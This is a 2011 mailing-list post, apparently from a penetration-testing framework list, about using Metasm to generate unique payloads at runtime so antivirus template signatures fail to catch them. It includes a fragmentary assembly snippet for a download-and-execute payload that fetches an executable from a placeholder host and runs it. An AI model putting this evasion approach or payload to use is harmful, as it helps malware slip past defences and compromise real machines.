mailing list archives
Payload AV evasion thoughts...
From: John B <johnb.electric () gmail com>
Date: Mon, 18 Apr 2011 09:09:17 -0400
I brought up this idea a few months ago on the mailing list but there might
be some more interest in it now. The idea is to use Metasm to dynamically
create payloads instead of using the base template. I've been able to
produce a portable (XP-7) message box payload that is assembled on the fly,
but I don't have enough ASM experience to make it unique meaning if two
people use the same title and msg string then the payloads would be
identical. I've seen some work in the framework with Metasm created encoders
outside the framework with a smiley
encoder<http://www.cr0.org/misc/smile.rb>for IM exploits.
Heres an example of how a basic download execute payload would look like
(example only probably not the most AV evasive way):
pe = Metasm::PE.assemble Metasm::Ia32.new, <<EOS
.import 'shell32' ShellExecuteA execute
.import 'urlmon' URLDownloadToFileA download
URL db "http://someaddress.com/download/hellow.exe
PATH db "c:/users/john/testd.exe",0
CMD db "open",0
Combine that with code to make it portable across all systems then add
a encoding stub and we can create unique payloads every time with out
the need for templates (with the assumption that the templates are the
main way of detecting payloads).
I will continue to work on some full examples but anyone with asm
experience who could create some dynamic encoders with Metasm would
really be helpful.
- Payload AV evasion thoughts... John B (Apr 18)